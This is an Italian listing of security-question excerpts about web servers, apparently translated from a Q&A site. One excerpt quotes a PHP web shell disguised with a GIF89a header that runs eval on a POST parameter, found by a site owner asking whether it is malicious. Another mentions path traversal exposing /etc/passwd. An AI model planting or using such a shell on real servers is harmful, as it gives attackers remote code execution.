Domande con tag 'webserver'

domande con tag
4
risposte

Devo usare SSL per l'accesso locale?

Ho un servizio web a cui è possibile accedere solo dai siti web ospitati sullo stesso server (io uso 127.0.0.1 ip). Dovrei usare SSL per le comunicazioni tra i siti e il servizio, o creerei solo inutili spese generali senza aumentare la sicur...
posta 26.07.2012 - 09:33
3
risposte

Pericolo di attacchi di attraversamento del percorso

Ho installato un'applicazione di test in Linux. Non ho controllato i percorsi al suo interno, quindi se l'utente inserisce / etc / passwd , quel file verrà visualizzato a lui. Tuttavia, voglio capire che cosa si può fare di più se il mio sit...
posta 08.05.2012 - 18:29
3
risposte

C'è un modo per rubare codice PHP o ASP da un server web attraverso i protocolli HTTP (S)?

Sto lavorando su un'applicazione web che includa alcuni sviluppi personalizzati e mi preoccupa un po 'del furto di codice. Quindi la domanda che volevo porre è se sia - in generale - possibile rubare codice PHP o ASP da un server web in esecu...
posta 20.08.2015 - 02:52
6
risposte

Download di un file da un server con un segreto: in testo o binario?

Supponiamo che un utente possa fare clic su un pulsante su un sito Web e scaricare un file con un segreto. Via ajax. È più sicuro se un server genera quel file e lo invia come 1) zip, tar o simili - un file binario . Tipo di contenuto: appli...
posta 26.05.2017 - 19:06
4
risposte

Se Yahoo può essere hackerato, come possiamo proteggere i nostri piccoli siti web? [chiuso]

Law enforcement provided Yahoo in November 2016 with data files that a third party claimed was Yahoo user data. We analyzed this data with the assistance of outside forensic experts and found that it appears to be Yahoo user data. Based...
posta 18.12.2016 - 12:30
5
risposte

Proteggi contro un attacco che modifica .htaccess?

Ho un server dedicato. Non c'è codice / sito in diretta ora, solo una pagina in arrivo. Pochi minuti fa mi sono reso conto che qualcuno ha cambiato il file .htaccess. Come posso proteggere da questo tipo di attacco? Il nuovo htaccess conti...
posta 09.04.2013 - 21:30
2
risposte

Qual è l'obiettivo finale di hackerare un server web? [chiuso]

Recentemente ho notato un sacco di traffico generato da bot automatizzati che stavano verificando la presenza di vulnerabilità nel mio server web. Stavano principalmente cercando modi per hackerare in plesk / wordpress che non avevo nemmeno in e...
posta 15.01.2014 - 12:13
3
risposte

Questo file PHP contiene un'eval in una variabile POST un'indicazione di compromesso?

Ho trovato questo file sul mio server, contiene il seguente codice: GIF89a <?php eval ($_POST[plm12345plm]); ?> Non c'è altro codice oltre quello sopra. È dannoso?     
posta 04.05.2015 - 23:25
3
risposte

Autenticità del sito / verifica senza SSL

Ci sono altri modi per verificare che il server web che stai visitando sia effettivamente quello giusto? Ad esempio, se il DNS di un nome di dominio è stato ipoteticamente dirottato e gli utenti sono stati indirizzati a un sito di phishing che...
posta 20.11.2013 - 10:35
2
risposte

Domanda discutibile a /user/soapCaller.bs

I miei registri del server web hanno rivelato una richiesta a /user/soapCaller.bs da 220.226.188.32, che viene mappata a Mumbai, in India. L'agente utente HTTP è chiamato "Morpheus * Scanner". Il mio server ha restituito un errore 404. Ov...
posta 10.05.2012 - 22:18